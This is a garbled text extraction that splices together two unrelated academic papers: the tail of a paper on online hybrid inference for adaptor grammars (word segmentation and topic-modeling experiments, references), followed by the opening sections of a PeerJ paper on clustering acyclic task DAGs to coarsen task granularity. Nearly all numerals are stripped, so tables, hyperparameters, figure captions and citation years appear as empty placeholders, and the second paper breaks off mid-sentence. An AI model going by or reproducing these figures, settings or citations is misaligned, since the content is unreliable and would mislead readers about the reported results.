over { , . . . ,k}. is much faster than variational approach—but i is usually on the order of thousands. likewise, our hybrid approach also only needs the less expensive inside algorithm to sample trees. and while each iteration is less expensive, our ap- proach can achieve reasonable results with only a single pass through the data. and thus only requires o(d) calls to the inside algorithm. because the inside-outside algorithm is funda- mental to each of these algorithms, we use it as a common basis for comparison across different im- plementations. this is over-generous to variational approaches, as the full inside-outside computation is more expensive than the inside probability computa- tion required for sampling in mcmc and our hybrid approach. experiments and discussion we implement our online adaptor grammar model (online) in python and compare it against both mcmc (johnson and goldwater, , mcmc) and the variational inference (cohen et al., , vari- ational). we use the latest implementation of mcmc sampler for adaptor grammars and simulate the variational approach using our implementation. for mcmc approach, we use the best settings re- ported in johnson and goldwater ( ) with incre- mental initialization and table label resampling. available at http://www.umiacs.umd.edu/˜zhaike/. http://web.science.mq.edu.au/˜mjohnson/code/ py-cfg- - - .tgz model and settings ctb pku cityu unigram collocation unigram collocation unigram collocation m c m c iter . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) iter . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) iter . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) iter . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) o n l in e κ τ kword = k kcolloc = k kword = k kcolloc = k kword = k kcolloc = k . . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) variational . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) table : word segmentation accuracy measured by word token f scores and negative log-likelihood on held-out test dataset in the brackets (lower the better, on the scale of ) for our online model against mcmc approach (johnson et al., ) on various dataset using the unigram and collocation grammar. e+ e+ e+ e+ e+ # of inside−outside function calls f− s co re model mcmc online variational (a) unigram grammar. e+ e+ e+ e+ e+ # of inside−outside function calls f− s co re model mcmc online variational (b) collocation grammar. figure : word segmentation accuracy measured by word token f scores on brent corpus of three approaches against number of inside-outside function call using unigram (upper) and collo- cation (lower) grammars in table . our online settings are batch size b = , decay inertia τ = , decay rate κ = . for unigram grammar; and mini- batch size b = , decay inertia τ = , decay rate κ = . for collocation grammar. tng s are refined at interval u = . truncation size is set to kword = . k and kcolloc = k. the settings are chosen from cross validation. we observe simi- lar behavior under κ = { . , . , . }, τ = { , , }, b = { , } and u = { , , }. for online inference, we parallelize each minibatch with four threads with settings: batch size b = and tng refine- ment interval u = . online approach runns for two passes over datasets. variational runs fifty iterations, with the same truncation level as in online. for negative log-likelihood eval- uation, we train the model on a random % of the data, and hold out the rest for testing. we observe similar behavior for . word segmentation we evaluate our online adaptor grammar on the task of word segmentation, which focuses on identify- ing word boundaries from a sequence of characters. this is especially the case for chinese, since char- acters are written in sequence without word bound- aries. we first evaluate all three models on the stan- dard brent version of the bernstein-ratner cor- pus (bernstein-ratner, ; brent and cartwright, , brent). the dataset contains k sentences, . k distinct words, and distinct characters. we compare the results on both unigram and colloca- tion grammars introduced in johnson and goldwater ( ) as listed in table . figure illustrates the word segmentation ac- curacy in terms of word token f -scores on brent against the number of inside-outside function calls for all three approaches using unigram and colloca- tion grammars. in both cases, our online approach converges faster than mcmc and variational ap- proaches, yet yields comparable or better perfor- mance when seeing more data. in addition to the brent corpus, we also evalu- ate three approaches on three other chinese datasets compiled by xue et al. ( ) and emerson ( ): • chinese treebank . (ctb ): k sentences, k distinct words, . k distinct characters; our model under κ = { . , . } and τ = { , }. we use all punctuation as natural delimiters (i.e., words cannot cross punctuation). • peking university (pku): k sentences, k distinct words, . k distinct characters; and • city university of hong kong (cityu): k sentences, k distinct words, and k distinct characters. we compare our inference method against other approaches on f score. while other unsupervised word segmentation systems are available (mochi- hashi et al. ( ), inter alia), our focus is on a di- rect comparison of inference techniques for adaptor grammar, which achieve competitive (if not state-of- the-art) performance. table shows the word token f -scores and neg- ative likelihood on held-out test dataset of our model against mcmc and variational. we randomly sample % of the data for testing and the rest for training. we compute the held-out likelihood of the most likely sampled parse trees out of each model. our online approach consistently better segments words than variational and achieves comparable or better results than mcmc. for mcmc, johnson and goldwater ( ) show that incremental initialization—or online updates in general—results in more accurate word segmenta- tion, even though the trees have lower posterior probability. similarly, our online approach initial- izes and learns them on the fly, instead of initializing the grammatons and parse trees for all data upfront as for variational. this uniformly outperforms batch initialization on the word segmentation tasks. . infinite vocabulary topic modeling topic models often can be replicated using a care- fully crafted pcfg (johnson, ). these pow- erful extensions can capture topical collocations and sticky topics; these embelishments could fur- ther improve nlp applications of simple unigram topic models such as word sense disambigua- tion (boyd-graber and blei, ), part of speech their results are not directly comparable: they use different subsets and assume different preprocessing. note that this is only an approximation to the true held-out likelihood, since it is impossible to enumerate all the possible parse trees and hence compute the likelihood for a given sen- tence under the model. we train all models with topics with settings: tng re- finement interval u = , truncation size ktopic = k, and the mini-batch size b = . we observe a similar behavior under κ ∈{ . , . } and τ ∈{ , }. . . # of passes over the dataset pm i inference infvoc mcmc online variational ⌧ : ⌧ : ⌧ :  . . # of passes over the dataset pm i inference infvoc mcmc online variational co he re nc e figure : the average coherence score of topics on de-news datasets against infvoc approach and other inference tech- niques (mcmc, variational) under different settings of de- cay rate κ and decay inertia τ using the infvoc lda grammar in table . the horizontal axis shows the number of passes over the entire dataset. tagging (toutanova and johnson, ) or dialogue modeling (?). however, expressing topic models in adaptor grammars is much slower than traditional topic models, for which fast online inference (hoff- man et al., ) is available. zhai and boyd-graber ( ) argue that online inference and topic models violate a fundamental as- sumption in online algorithms: new words are intro- duced as more data are streamed to the algorithm. zhai and boyd-graber ( ) introduce an infer- ence framework, infvoc, to discover words from a dirichlet process with a character n-gram base dis- tribution. we show that their complicated model and on- line inference can be captured and extended via an appropriate pcfg grammar and our online adap- tor grammar inference algorithm. our extension to infvoc generalizes their static character n-gram model, learning the base distribution (i.e., how words are composed from characters) from data. in contrast, their base distribution was learned from a dictionary as a preprocessing step and held fixed. this is an attractive testbed for our online infer- ence. within a topic, we can verify that the words we discover are relevant to the topic and that new words rise in importance in the topic over time if they are relevant. for these experiments, we treat each token (with its associated document pseudo-word −j) as a single sentence, and each minibatch contains only one sentence (token). the plot is generated with truncation size ktopic = k, mini-batch size b = , truncation pruning interval u = , decay inertia τ = , and decay rate κ = . . all py hyper- parameters are optimized. new words added at corresponding minibatch minibatch- k ... -union -wage ... -minist ... -year ... -bill ... -increas -tax ... -reform ... -lower ... -percent ... -committe ... -pension ... minibatch- k -year -minist -tax -pension -reform ... -committe ... -percent ... -lower ... -increas ... -bill ... -union -wage ... -schroeder ... -deduct ... minibatch- k -deduct -tax -year -pension -reform ... -minist ... -increas ... -committe ... -schroeder -percent ... -lower ... -bill ... -union ... -wage ... minibatch- k -tax -year -reform -pension -minist -increas ... -schroeder ... -committe ... -percent ... -lower ... -bill ... -union ... -deduct ... -wage ... minibatch- k -tax -reform -pension -year -minist -increas ... -lower ... -percent ... -committe ... -bill ... -wage ... -union ... -schroeder ... -deduct ... minibatch- k -reform ... -increas ... -union ... -wage ... -percent ... -year ... -tax ... -minist ... -bill ... -lower pension committe ... schroeder affair ... minibatch- k ... -percent -tax -reform ... -year -increas ... -wage ... -minist ... -union ... -lower ... -schroeder ... -bill ... -committe ... -pension ... deduct shop ... recess ... primarili ... minibatch- k -tax -schroeder -year -reform -minist -pension ... -increas ... -lower ... -percent -committe ... -union ... -bill ... -wage ... -deduct ... recipi ... minibatch- k -tax -year -reform -schroeder -increas -minist ... -pension ... -percent ... -lower ... -bill ... -committe ... -union ... -wage ... -deduct ... alloc ... club ... figure : the evolution of one topic—concerning tax policy—out of five topics learned using online adaptor grammar inference on the de-news dataset. each minibatch represents a word processed by this online algorithm; time progresses from left to right. as the algorithm encounters new words (bottom) they can make their way into the topic. the numbers next to words represent their overall rank in the topic. for example, the word “pension” first appeared in mini-batch , was ranked at after minibatch and became one of the top words in this topic after minibatches (tokens). quantitatively, we evaluate three different infer- ence schemes and the infvoc approach on a col- lection of english daily news snippets (de-news). we used the infvoc lda grammar (table ). for all approaches, we train the model with five topics, and evaluate topic coherence (newman et al., ), which correlates well with human ratings of topic interpretability (chang et al., ). we collect the co-occurrence counts from wikipedia and compute the average pairwise pointwise mutual information (pmi) score between the top ranked words of ev- ery topic. figure illustrates the pmi score for both approaches. our approach yields comparable or bet- ter results against all other approaches under most conditions. qualitatively, figure shows an example of a topic evolution using online adaptor grammar for the de-news dataset. the topic is about “tax pol- icy”. the topic improves over time; words like “year”, “tax” and “minist(er)” become more promi- nent. more importantly, the online approach discov- available at http://www.umiacs.umd.edu/˜zhaike/. the de-news dataset is randomly selected subset of . k english documents from http://homepages.inf.ed.ac. uk/pkoehn/publications/de-news/. it contains . k unique types and over k word tokens. tokenization and stemming provided by nltk (bird et al., ). ers new words and incorporates them into the topic. for example, “schroeder” (former german chancel- lor) first appeared in minibatch , was success- fully picked up by our model, and became one of the top ranked words in the topic. conclusion probabilistic modeling is a useful tool in understand- ing unstructured data or data where the structure is latent, like language. however, developing these models is often a difficult process, requiring signifi- cant machine learning expertise. adaptor grammars offer a flexible and quick way to prototype and test new models. despite ex- pensive inference, they have been used for topic modeling (johnson, ), discovering perspec- tive (hardisty et al., ), segmentation (johnson and goldwater, ), and grammar induction (co- hen et al., ). we have presented a new online, hybrid inference scheme for adaptor grammars. unlike previous ap- proaches, it does not require extensive preprocess- ing. it is also able to faster discover useful structure in text; with further development, these algorithms could further speed the development and application of new nonparametric models to large datasets. acknowledgments we would like to thank the anonymous reviewers, kristina toutanova, mark johnson, and ke wu for insightful discussions. this work was supported by nsf grant ccf- . boyd-graber is also supported by nsf grant iis- . any opin- ions, findings, conclusions, or recommendations ex- pressed here are those of the authors and do not nec- essarily reflect the view of the sponsor. references nan bernstein-ratner. . the phonology of parent child speech. children’s language, : – . steven bird, ewan klein, and edward loper. . nat- ural language processing with python. o’reilly me- dia. christopher m. bishop. . pattern recognition and machine learning. springer-verlag new york, inc., secaucus, nj, usa. david m. blei and michael i. jordan. . variational inference for dirichlet process mixtures. journal of bayesian analysis, ( ): – . benjamin börschinger and mark johnson. . using rejuvenation to improve particle filtering for bayesian word segmentation. in proceedings of the association for computational linguistics. léon bottou. . online algorithms and stochastic approximations. in online learning and neural net- works. cambridge university press, cambridge, uk. jordan boyd-graber and david m. blei. . putop: turning predominant senses into a topic model for wsd. in th international workshop on semantic evaluations. michael r. brent and timothy a. cartwright. . dis- tributional regularity and phonotactic constraints are useful for segmentation. volume , pages – . jonathan chang, jordan boyd-graber, and david m. blei. . connections between the lines: augment- ing social networks with text. in knowledge discovery and data mining. jean-cédric chappelier and martin rajman. . monte-carlo sampling for np-hard maximization problems in the framework of weighted parsing. in natural language processing, pages – . shay b. cohen, david m. blei, and noah a. smith. . variational inference for adaptor grammars. in conference of the north american chapter of the as- sociation for computational linguistics. shay b. cohen. . computational learning of prob- abilistic grammars in the unsupervised setting. ph.d. thesis, carnegie mellon university. thomas emerson. . the second international chi- nese word segmentation bakeoff. in fourth sighan workshop on chinese language, jeju, korea. thomas s. ferguson. . a bayesian analysis of some nonparametric problems. the annals of statis- tics, ( ). sharon goldwater, thomas l. griffiths, and mark john- son. . producing power-law distributions and damping word frequencies with two-stage language models. journal of machine learning research, pages – , july. eric hardisty, jordan boyd-graber, and philip resnik. . modeling perspective using adaptor grammars. in proceedings of emperical methods in natural lan- guage processing. matthew hoffman, david m. blei, and francis bach. . online learning for latent dirichlet allocation. in proceedings of advances in neural information processing systems. matthew hoffman, david m. blei, chong wang, and john paisley. . stochastic variational inference. in journal of machine learning research. mark johnson and sharon goldwater. . improving nonparameteric bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. in conference of the north american chapter of the association for computational linguistics. mark johnson, thomas l. griffiths, and sharon goldwa- ter. . adaptor grammars: a framework for speci- fying compositional nonparametric bayesian models. in proceedings of advances in neural information processing systems. mark johnson, thomas l. griffiths, and sharon goldwa- ter. . bayesian inference for pcfgs via markov chain monte carlo. in conference of the north ameri- can chapter of the association for computational lin- guistics. mark johnson. . pcfgs, topic models, adaptor grammars and learning topical collocations and the structure of proper names. in proceedings of the as- sociation for computational linguistics. kenichi kurihara, max welling, and yee whye teh. . collapsed variational dirichlet process mixture models. in international joint conference on artifi- cial intelligence. christopher d. manning and hinrich schütze. . foundations of statistical natural language process- ing. the mit press, cambridge, ma. david mimno, matthew hoffman, and david blei. . sparse stochastic inference for latent dirichlet alloca- tion. in proceedings of the international conference of machine learning. daichi mochihashi, takeshi yamada, and naonori ueda. . bayesian unsupervised word segmentation with nested pitman-yor language modeling. in proceedings of the association for computational linguistics. peter müller and fernando a. quintana. . non- parametric bayesian data analysis. statistical science, ( ). ramesh nallapati, william cohen, and john lafferty. . parallelized variational em for latent dirichlet allocation: an experimental evaluation of speed and scalability. in icdmw. david newman, sarvnaz karimi, and lawrence cave- don. . external evaluation of topic models. in proceedings of the aurstralasian document comput- ing symposium. j. pitman and m. yor. . the two-parameter poisson- dirichlet distribution derived from a stable subordina- tor. annals of probability, ( ): – . hiroyuki shindo, yusuke miyao, akinori fujino, and masaaki nagata. . bayesian symbol-refined tree substitution grammars for syntactic parsing. in pro- ceedings of the association for computational lin- guistics. erik b. sudderth and michael i. jordan. . shared segmentation of natural scenes using depen- dent pitman-yor processes. in proceedings of ad- vances in neural information processing systems. yee whye teh, michael i. jordan, matthew j. beal, and david m. blei. . hierarchical dirichlet pro- cesses. journal of the american statistical associa- tion, ( ): – . kristina toutanova and mark johnson. . a bayesian lda-based model for semi-supervised part- of-speech tagging. in proceedings of advances in neural information processing systems, pages – . martin j. wainwright and michael i. jordan. . graphical models, exponential families, and varia- tional inference. foundations and trends in machine learning, ( – ): – . chong wang and david m. blei. . truncation-free online variational inference for bayesian nonparamet- ric models. in proceedings of advances in neural in- formation processing systems. naiwen xue, fei xia, fu-dong chiou, and marta palmer. . the penn chinese treebank: phrase structure annotation of a large corpus. natural language engi- neering. limin yao, david mimno, and andrew mccallum. . efficient methods for topic model inference on streaming document collections. in knowledge dis- covery and data mining. ke zhai and jordan boyd-graber. . online latent dirichlet allocation with infinite vocabulary. in pro- ceedings of the international conference of machine learning. ke zhai and jason d. williams. . discovering latent structure in task-oriented dialogues. in proceedings of the association for computational linguistics. ke zhai, jordan boyd-graber, nima asadi, and mo- hamad alkhouja. . mr. lda: a flexible large scale topic modeling package using variational infer- ence in mapreduce. in proceedings of world wide web conference. submitted september accepted november published january corresponding author bérenger bramas, berenger.bramas@inria.fr academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright bramas and ketterlin distributed under creative commons cc-by . open access improving parallel executions by increasing task granularity in task-based runtime systems using acyclic dag clustering bérenger bramas , and alain ketterlin , , camus, inria nancy - grand est, nancy, france icps team, icube, illkirch-graffenstaden, france université de strasbourg, strasbourg, france abstract the task-based approach is a parallelization paradigm in which an algorithm is transformed into a direct acyclic graph of tasks: the vertices are computational elements extracted from the original algorithm and the edges are dependencies between those. during the execution, the management of the dependencies adds an overhead that can become significant when the computational cost of the tasks is low. a possibility to reduce the makespan is to aggregate the tasks to make them heavier, while having fewer of them, with the objective of mitigating the importance of the overhead. in this paper, we study an existing clustering/partitioning strategy to speed up the parallel execution of a task-based application. we provide two additional heuristics to this algorithm and perform an in-depth study on a large graph set. in addition, we propose a new model to estimate the execution duration and use it to choose the proper granularity. we show that this strategy allows speeding up a real numerical application by a factor of on a multi-core system. subjects algorithms and analysis of algorithms, distributed and parallel computing, scientific computing and simulation keywords task-based, graph, dag, clustering, partitioning introduction the task-based (tb) approach has become a popular method to parallelize scientific applications in the high-performance computing (hpc) community. compared to the classical approaches, such as the fork-join and spawn-sync paradigms, it offers several advantages as it allows to describe the intrinsic parallelism of any algorithms and run parallel executions without global synchronizations. behind the scenes, most of the runtime systems that manage the tasks use a direct acyclic graph where the nodes represent the tasks and the edges represent the dependencies. in this model, a task becomes ready when all its predecessors in the graph are completed, which causes the use a local synchronization mechanism inside the runtime system to manage the dependencies. there are now many task-based runtime systems (danalis et al., ; perez, badia & labarta, ; gautier et al., ; bauer et al., ; tillenius, ; augonnet et al., ; bramas, b) and each of them has its own specificity, capabilities and interface. moreover, the well-known and how to cite this article bramas b, ketterlin a. . improving parallel executions by increasing task granularity in task-based runtime systems using acyclic dag clustering. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:berenger.bramas@inria.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. widely used openmp standard (openmp architecture review board, ) also supports the tasks and dependencies paradigm since version . the advantage of the method to achieve high-performance and facilitate the use of heterogeneous computing nodes has been demonstrated by the development of many applications in various fields (sukkari et al., ; moustafa et al., ; carpaye, roman & brenner, ; agullo et al., ; agullo et al., ; agullo et al., ; myllykoski & mikkelsen, ). however, multiple challenges remain open to bring the task-based approach to non-hpc experts and to support performance portability. in our opinion, the two main problems on a single computing node concern the scheduling and granularity. the scheduling is the distribution of the tasks over the processing units, i.e., the selection of a task among the ready ones and the choice of a processing unit. this is a difficult problem, especially when using heterogeneous computing nodes as it cannot be solved optimally in general. much research is continuously conducted by the hpc and the scheduling communities to provide better generic schedulers (bramas, a). the granularity issue is related to the size of the tasks. when the granularity is too small, the overhead of task management, and the potential data movements, becomes dominant and can dramatically increase the execution time due to the use of synchronizations (tagliavini, cesarini & marongiu, ). on the other hand, when the granularity is too large, it reduces the degree of parallelism and leaves some processing units idle. managing the granularity can be done at different levels. in some cases, it is possible to let the developer adapt the original algorithms, computational kernels, and data structures, but this could require significant programming effort and expertise (bramas, ). an alternative, as we aim to study in this paper, is to investigate how to cluster the nodes of task graphs to increase the granularity of the tasks and thus obtain faster execution by mitigating the overhead from the management of the dependencies. an important asset of this approach is that working at the graph level allows creating a generic method independent from the application and what is done at the user level, but also independent of the task-based runtime system that will be used underneath. while graph partitioning/clustering is a well-studied problem, it is important to note that the obtained meta-dag (direct acyclic graph) must remain acyclic, i.e., the dependencies between the cluster of nodes should ensure to be executable as a graph of tasks, and keep a large degree of parallelism. hence, the usual graph partitioning methods do not work because they do not take into account the direction of the edges (hendrickson & kolda, ). moreover, the dag of tasks we target can be of several million nodes, and we need an algorithm capable to process them. in the current study, we use a generic algorithm that has been proposed to solve this problem (rossignon et al., ), and we refer to it as the general dag clustering algorithm (gdca). the contributions of the paper are the following: • we provide two variants of the gdca, which change how the nodes are aggregated and allow to have clusters smaller than the targeted size; bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. an implementation of our method is publicly available at https://gitlab.inria. fr/bramas/dagpar. besides, we provide the test cases used in this paper at https: //figshare.com/projects/dagpar/ . • we provide a new model to simulate the execution of a dag, by considering that there are overheads in the execution of each task, but also while releasing or picking a task, and we use this model to find the best clustering size; • we evaluate and compare dgca and our approach on a large graph set using emulated executions; • we evaluate and compare dgca and our approach on chukrut (conservative hyperbolic upwind kinetic resolution of unstructured tokamaks) (coulette et al., ) that computes the transport equation on a d unstructured mesh. the paper is organized as follows. in ‘related work’, we summarize the related work and explain why most existing algorithms do not solve the dag of tasks clustering problem. then, in ‘problem statement and notations’, we describe in detail the dag of tasks clustering problem. we introduce the modifications of the gdca in ‘dag of tasks clustering’. finally, we evaluate our approach in ‘experimental study’. the source code of the presented method and all the material needed to reproduce the results of this paper are publicly available . related work partitioning or clustering usually refers to dividing a graph into subsets so that the sum of costs on edges between nodes in different subsets is minimum. however, our objective here is not related to the costs of the edges, which we consider null, but to the execution time of the resulting graph in parallel considering a given number of threads and runtime overhead. hence, while it is generally implicit that partitioning/clustering is related to the edge cut, we emphasize that it should be seen as a graph symbolic transformation and that the measure of quality and final objective differ depending on the problem to solve. partitioning tends to refer to finding a given number of subgraphs, which is usually much lower than the number of nodes. in fact, once a graph is partitioned, it is usually dispatched over different processes and thus there must be as many subgraphs as there are processes, whereas clustering is more about finding subgraphs of a given approximate size or bounded by a given size limit, where nodes are grouped together if it appears that they have a certain affinity. this is a reason why the term clustering is also used to describe algorithms that cluster indirect graphs by finding hot spots (schaeffer, ; xu & tian, ; shun et al., ). moreover, the size of a cluster is expected to be much lower than the number of nodes. the granularity problem of the dag of tasks with a focus on the parallel execution has been previously studied. sarkar and hennessy designed a method to execute functional programs at a coarse granularity because working at fine granularity, i.e. at the instruction level, was inefficient on general purpose multiprocessors (sarkar & hennessy, ; sarkar, ). they proposed a compile-time clustering approach to achieve the trade-off between parallelism and the overhead of exploiting parallelism and worked on graphs obtained directly from the source code. as we do in the current paper, they focused on the performance, i.e. best execution time, as a measure of the quality of the clustering and their estimation of execution times were based on the number of processors, communication bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://gitlab.inria.fr/bramas/dagpar https://gitlab.inria.fr/bramas/dagpar https://figshare.com/projects/dagpar/ https://figshare.com/projects/dagpar/ https://peerj.com http://dx.doi.org/ . /peerj-cs. the thesis that includes this final version is written in french. and scheduling overhead. however, their clustering algorithm is different from ours. it starts by considering each node as a cluster and successively merges them until it obtains a single subgraph while keeping track of the best configuration found so far to be used at the end. by doing so, their algorithm has above quadratic complexity and thus is unusable to process very large graphs. also, in our case, we do not take communication into account, and we consider that some parts of the scheduling overhead are blocking: no threads can peek a task when another thread is already interacting with the scheduler. more recently rossignon et al. ( ) proposed gdca to manage dag of fine grain tasks on multi-core architectures. their first solution is composed of three main algorithms called sequential, front and depth front. the sequential algorithm puts together a task that has only one predecessor with its parent. the front algorithm reduces the width of the graph at each level. the depth front performs a breadth-first traversal of the descendants of a task to aggregate up to a given number of tasks together. they extended this last algorithm (rossignon, ) by proposing a generic method, gdca, that we use in the current study . the authors also provided a new execution model to simulate the execution of a dag where they use an overhead per task and a benefit coefficient for aggregation. in a more general context, the community has focused on indirect graph partitioning. a classical approach, called the two-way partitioning, consists in splitting a graph into two blocks of roughly equal size or in minimizing the edge cut between the two blocks (kernighan & lin, ; fiduccia & mattheyses, ). the method can be applied recursively multiple times until the desired number of subgraphs is reached. later, multi- way methods have been proposed (hendrickson & leland, ; karypis & kumar, ; karypis et al., ) and most of them have been done in the context of very-large-scale integration (vlsi) in an integrated circuit. the motivation is to partition large vlsi networks into smaller blocks of roughly equal size to minimize the interconnections between the blocks. the multi-way partitioning has been improved by taking into account the direction of the edges in the context of boolean networks (cong, li & bagrodia, ). the authors showed that considering the direction of the edges is very helpful, if not mandatory, in the design in order to have acyclic partitioning. the problem of acyclic dag partitioning has also been studied by solving the edge- cut problem, i.e., by minimizing the number of weights of the edges having endpoints in different parts and not by focusing on the execution time (herrmann et al., ). we argue that the execution time is the only criteria that should be evaluated and that measuring the edge-cut coefficient is not accurate to estimate the benefit of the clustering. other studies have focused on partitioning with special constraints, such as finding a minimum cost partition of the graph into subsets of size less than or equal to a criteria (kernighan, ), which can be seen as dividing a program into pages of fixed size to minimize the frequency of inter-page transitions. the problem also exists with fpga, where a complete program does not fit in the field and thus should be divided in sub-parts with the objective of minimizing the re-programming (purna & bhatia, ). in linear algebra, the lu factorization can be represented as a tree graph that can be partitioned in linear time (pothen & alvarado, ). bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the real application we used to assess our method solves the transport equation on unstructured meshes. task-based implementations to solve the transport equation on a grid (i.e. structured and regular mesh) have already been proposed by moustafa et al. ( ). the authors have created a version on top of the parsec runtime system where they partitioned the mesh and avoided working on the graph of tasks. working on the mesh is another way to partition the graph, but this was possible in their case because the dependencies on the mesh were known and regular. the dependencies were not impacted by the clustering because an inter-partition dependency would simply be transformed into the exchange of a message. in other words, a process could work on its sub-graph even if some of its nodes are pending for input that will be sent by other processes. this is quite different from our approach, as we consider that a sub-graph is transformed into a macro-task, and hence all input dependencies must be satisfied before a thread starts to work on it. problem statement and notations consider a dag g(v ,e) where the vertices v are tasks and the edges e are the dependencies between those. the clustering problem of a dag of tasks consists in finding the best clusters to obtain the minimal makespan possible when the dag is executed on a specific hardware or execution model. implicitly, the hardware or execution model should have some overheads, which could come from the management of the tasks for example, or the minimal execution time will always be obtained without clustering, i.e. on irrealistic hardware without overhead, any clustering of tasks will reduce the degree of parallelism without offering any advantages. finding the optimal solution is np-complete (johnson & garey, ) because it requires to test all the possible combinations of clusters. moreover, evaluating a solution is performed by emulating a parallel execution, which has a complexity of o(v log(w )+e), where w is the number of workers and usually considered constant. in this paper, we solve a sub-problem that we call the clustering problem of a dag of tasks with no-communications since we consider that the weights of the edges are insignificant and the edges are only here to represent the dependencies. this problem is met when moving data has no cost or is negligible, which is the case if the workers are threads and the numa effects negligible or if we use processes but have a way to hide communication with computation. classical partitioning algorithms for indirected graphs cannot be used because they will not obtain an acyclic macro-graph. formally, a macro-graph remains acyclic if for any edge a→b the corresponding clusters c(a)≤c(b) (note that c(a)=c(b) means that a and b are in the same cluster). this is also know as the convexity constraint (sarkar & hennessy, ) where we say that a subgraph h of graph g is convex if any path p(a,b), with a, b ∈h, is completely contained in h. consequently, one way to solve the problem would be to find a valid topological order of the nodes and divide it into clusters. we write m the desired size of clusters, which should be seen as an upper limit such that no cluster will have more than m nodes. parallel efficiency and edge cut. there is a relation between the edge-cut and the parallel execution when the edges represent communication costs between cluster owners. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) (b) figure example of clustering a dag of nodes targeting cluster of m = nodes. if each edge has a weight of , the cut cost is for (a) and for (b). if each node is a task of cost and edges are not taken into account, the parallel execution duration is units for (a) and units for (b). if each node is a task of cost and edges are considered as communication of unit sent sequentially after completion of the clus- ter, the parallel execution duration is units for (a) and units for (b). full-size doi: . /peerjcs. /fig- (a) (b) figure example of clustering a dag of nodes targeting cluster of m = nodes. if each edge has a weight of , the cut cost is for (a) and for (b). if each node is a task of cost and edges are not taken into account, the parallel execution duration is units for (a) and units for (b). if each node is a task of cost and edges are considered as communication of unit sent sequentially after completion of the clus- ter, the parallel execution duration is units for (a) and units for (b). full-size doi: . /peerjcs. /fig- however, looking only at the edge-cut is not relevant when the final and only objective is the parallel efficiency. moreover, this is even truer in our case because the weights of the edges are neglected. to illustrate the differences, we provide in figs. and examples that demonstrate that when attempting to obtain a faster execution, the edge-cut is not the most important feature. in both examples, the configuration with the lowest edge-cut is slower when executed in parallel whether communications are taken into account or not. clustering and delay in releasing dependencies. traditionally, graph partitioning is used to distribute the workload on different processes while trying to minimize communications. in our case, however, a cluster is a macro-task and is managed like a task: it has to wait bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. (a) (b) (c) figure example of clustering three dags of eight nodes targeting in two cluster of m = nodes. the obtained meta-dag is the same despite the original dependencies between the nodes, and the cluster on the right will have to wait that the cluster on the left is fully executed to become ready. (a) graph with a dependency between the two first nodes. (b) graph with dependencies between first and last nodes. (c) graph with multiple dependencies. full-size doi: . /peerjcs. /fig- for all its dependencies to be released to become ready, and it releases its dependencies once it is entirely completed and not after the completion of each task that composes it. this means the number of dependencies that exists originally between the tasks of two macro-tasks is not relevant, because if there is one or many then the two macro-tasks are linked, as illustrated by the fig. . a side effect is that creating macro-tasks delays the release of the dependencies. in fact, the release of the dependencies can be delayed by the complete duration of the macro-task compared to execution without clustering and this delay also implies a reduction of the degree of parallelism. however, if the degree of parallelism at a global level remains high, the execution could still be faster because it is expected that the clustering will reduce the overhead. dag of tasks clustering modification of the gdca before entering into the details of our approach, we first give a general description of the original algorithm. the algorithm continuously maintains a list of ready tasks by processing the graph while respecting the dependencies. it works on the ready tasks only to build a cluster. by doing so, all the predecessors of the ready tasks are already assigned to a cluster, and all the ready tasks and their successors are not assigned to any cluster. this strategy ensures that no cycle will be created while building the clusters. to create a cluster, the algorithm first picks one of the ready tasks, based on a heuristic that we call the initial-selection. then it iteratively aggregates some ready nodes to it until the cluster reaches m nodes, using what we call aggregate-selection. every time a node is put in a cluster, the algorithm releases its dependencies and potentially adds new ready tasks to the list. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. x (a) (b) (d)(c) y z vu x y z vu x y z vu x y z vu figure illustration of the gdca. ready tasks are in blue, tasks assigned to the new cluster are in red. (a) nodes x, y and z are ready, and here y is selected as first node for the current cluster p to create (initial-selection). (b) nodes x, v and z are ready, and we have to select the next nodes to put in p (agregate-selection). if the criteria to decide is the number of predecessors in the cluster, then v is selected. (c) nodes x and z are ready, and both nodes have zero predecessors in p. if we look at the successors they have in common with p, then u is selected. (d) node z is ready, and it might have no predecessors or successors in common with nodes in p. if we use a strict cluster size, then z should be added to p, otherwise, the cluster p is done. full-size doi: . /peerjcs. /fig- the initial-selection and the aggregate-selection are the two heuristics that decide which node to select to start a cluster, and which nodes to add to the ongoing cluster. the initial-selection picks the node with the lowest depth, where the depth of a node is the longest distance to the roots. the aggregate-selection picks the tasks that has the largest number of predecessors in the new cluster. for both selections, the lowest ids is selected in case of equality to enforce a strict order 